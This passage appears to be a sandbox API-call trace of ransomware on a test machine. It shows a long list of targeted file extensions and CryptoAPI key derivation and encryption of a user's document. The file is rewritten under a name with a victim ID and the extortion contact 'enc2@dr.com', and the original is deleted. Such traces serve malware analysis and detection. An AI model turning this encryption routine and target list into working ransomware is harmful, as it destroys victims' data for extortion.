.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".doc") returned=".doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.385] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.385] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.386] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.403] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe202, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xe202, lpOverlapped=0x0) returned 1
	[0189.413] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.415] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0189.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.423] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.423] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.424] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91f0) returned 1
	[0189.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.451] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xe202, dwBufLen=0xe202 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xe210) returned 1
	[0189.452] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.453] RtlMoveMemory (in: Destination=0xfeb390, Source=0xfdd180, Length=0xe202 | out: Destination=0xfeb390) 
	[0189.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.453] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb390*, pdwDataLen=0x18a1ec*=0xe202, dwBufLen=0xe210 | out: pbData=0xfeb390*, pdwDataLen=0x18a1ec*=0xe210) returned 1
	[0189.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.457] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0189.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.458] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0189.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.458] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0189.458] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.458] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.461] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.464] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 132
	[0189.464] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.467] WriteFile (in: hFile=0x390, lpBuffer=0xfeb390*, nNumberOfBytesToWrite=0xe210, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfeb390*, lpNumberOfBytesWritten=0x18a648*=0xe210, lpOverlapped=0x0) returned 1
	[0189.473] CloseHandle (hObject=0x390) returned 1
	[0189.474] CloseHandle (hObject=0x388) returned 1
	[0189.474] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc")) returned 1
	[0189.482] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\n8imdqrly0-89m.doc")) returned 0
	[0189.482] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa222290, ftCreationTime.dwHighDateTime=0x1d97396, ftLastAccessTime.dwLowDateTime=0xa848d40, ftLastAccessTime.dwHighDateTime=0x1d97413, ftLastWriteTime.dwLowDateTime=0xa848d40, ftLastWriteTime.dwHighDateTime=0x1d97413, nFileSizeHigh=0x0, nFileSizeLow=0x5f2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="OP27ti.docx", cAlternateFileName="OP27TI~1.DOC")) returned 1
	[0189.482] lstrcmpW (lpString1="OP27ti.docx", lpString2="..") returned 1
	[0189.482] lstrcmpW (lpString1="OP27ti.docx", lpString2=".") returned 1
	[0189.482] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.482] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="OP27ti.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\OP27ti.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\OP27ti.docx"
	[0189.482] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\OP27ti.docx") returned 83
	[0189.483] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.483] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\OP27ti.docx", cchLength=0x53 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx") returned 0x53
	[0189.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.484] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx"
	[0189.484] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx") returned 83
	[0189.484] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.484] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0189.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.485] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.p